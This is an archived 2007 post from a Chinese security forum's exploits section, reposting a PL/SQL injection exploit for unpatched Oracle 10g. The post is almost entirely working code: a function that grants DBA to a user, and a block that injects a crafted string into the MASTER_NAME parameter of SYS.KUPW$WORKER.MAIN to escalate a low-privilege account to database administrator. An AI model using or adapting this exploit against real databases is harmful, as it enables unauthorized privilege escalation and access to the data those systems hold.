Oracle 10g SYS.KUPW$WORKER.MAIN PL/SQL Injection Exploit(页 1) - 安全测试代码{ Exploits and Shellcode } - 邪恶八进制信息安全团队技术讨论组努力为祖国的信息安全撑起一片蓝天

pub!1c 2007-1-25 22:08

Oracle 10g SYS.KUPW$WORKER.MAIN PL/SQL Injection Exploit

.[code]
/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret <[email]joxeankoret@yahoo.es[/email]>
* Privileges needed:
*
* - CREATE SESSION
* - CREATE PROCEDURE
*
*/
select *
from user_role_privs
;

CREATE OR REPLACE FUNCTION F1
RETURN NUMBER AUTHID CURRENT_USER
IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
COMMIT;
RETURN(1);
END;
/

DECLARE
MASTER_NAME VARCHAR2(200);
MASTER_OWNER VARCHAR2(200);
BEGIN
MASTER_NAME := ''' or ' || user || '.f1=1--';
MASTER_OWNER := 'bla';
SYS.KUPW$WORKER.MAIN(
MASTER_NAME => MASTER_NAME,
MASTER_OWNER => MASTER_OWNER
);
END;
/

select *
from user_role_privs
;

[/code]

页: [1]

邪恶八进制信息安全团队技术讨论组's Archiver

Oracle 10g SYS.KUPW$WORKER.MAIN PL/SQL Injection Exploit